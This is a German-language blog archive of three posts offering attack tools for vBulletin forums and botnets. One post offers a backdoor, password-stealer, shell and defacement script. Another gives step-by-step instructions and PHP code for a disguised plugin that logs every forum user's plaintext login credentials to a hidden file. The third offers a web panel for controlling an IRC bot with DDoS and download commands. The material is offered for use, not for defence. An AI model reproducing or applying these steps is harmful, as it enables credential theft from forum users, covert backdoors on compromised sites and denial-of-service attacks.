Archiv für die Kategorie Scripting

vBulletin „Hack“-Script

Hallo,

hatte mal wieder ein wenig langeweile und habe ein kleines „Hack“-Script – wenn man es denn so nennen darf – für vBulletin geschrieben. Eigentlich sollte es nur eine kleine Erweiterung für den Passwordlogger sein, aber es wurde dann doch etwas mehr.
How to:
– Bringt das Script auf den Server
oder
– Versucht an die MySQL Daten zu gelangen und versucht eine Verbindung von einem externen Server aufzubauen.

Funktionen:

  • Backdoor (Superadmin) einrichten
  • Installieren des Passwordstealers
  • Query
  • Custom File erstellen
  • Shell that server! (BETA)
  • Deface (Text, Aussehen kann selber bestimmt werden)
  • Download:
    Klick mich

    Advertisements

    Hinterlasse einen Kommentar

    vBulletin Passwordlogger

    Hallo,
    habe eben in 5 Minuten ein Script geschrieben, was wie ein Passwordstealer für vBulletin funktioniert 😉 Bedingung ist, dass ihr einen Adminacc habt, der Rechte hat, Templates zu ändern und Plugins zu erstellen.

    Zuerst geht ihr in die Style-Einstellungen und editiert das Template bei dem das Loginfeld ist (ist bei manchen Styles unterschiedlich, normalerweise „header“ oder „navbar“)

    Dort sucht ihr folgende Zeile:
    onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, $show[nopasswordempty])"
    und entfernt sie. Das sorgt dafür, dass das Passwortfeld ausgelesen werden kann.

    Nun müssen wir einen Hook erstellen. Klickt unten auf Addons & Plugins und dann auf „Plugin hinzufügen“.

    Der Titel ist egal, sollte aber möglichst unauffällig sein. Sowas wie „Cache Management“ wäre zum Beispiel besser als „R0FL PaZZWorDLoGGaaa“.
    Als Einstiegspunkt wählt ihr login_redirect.
    Der PHP Code der nun noch hinzugefügt werden muss sieht wie folgt aus:
    $pass = $_POST['vb_login_password'];
    $username = $_POST['vb_login_username'];
    $write = $username.':'.$pass.'
    ';
    $connection = fopen('cache.log', 'a+');
    fwrite($connection, $write);
    fclose($connection);

    Es wird nun username:pass in eine cache.log auf dem Server geschrieben.
    Ihr könnt das natürlich noch modifizieren, indem ihr Pfad usw anpasst. Wäre auch ratsam, die Datei weiter im System zu verstecken.

    Getestet mit vBulletin 3.7.* und 3.8.*

    MfG

    Hinterlasse einen Kommentar

    Underground IRC Connector

    Hallo,

    dieses „Tool“ – wie ich es nun mal bezeichne – habe ich vor längerer Zeit einmal geschrieben. Es erlaubt euch, euren IRC Bot als Webpanel Bot zu nutzen. Der „Underground IRC Connector“ verbindet sich mit eurem IRC Server und ihr könnt die Befehle bequem über ein Webpanel versenden.

    Das Script ist noch im BETA-Status. Bugs sind mir bislang keine bekannt, aber ihr könnt mich gerne kontaktieren, falls ihr einen findet. Bitte auch dazu schreiben, welchern Webserver und welche PHP Version ihr benutzt!

    In der aktuellen Version könnt ihr die Befehle für DDoS, Download und Update über die „config.php“ anpassen. (Bevor Fragen auftauchen: $lc steht für location ;)) Das Script wurde für den Hustla Bot optimiert, funktioniert aber auch mit allen andereren Bots.

    Download

    Eventuell werde ich nochmal ein Update rausbringen, habe aber eigenlich nicht vor, dass Projekt weiterzuführen.

    MfG

    Hinterlasse einen Kommentar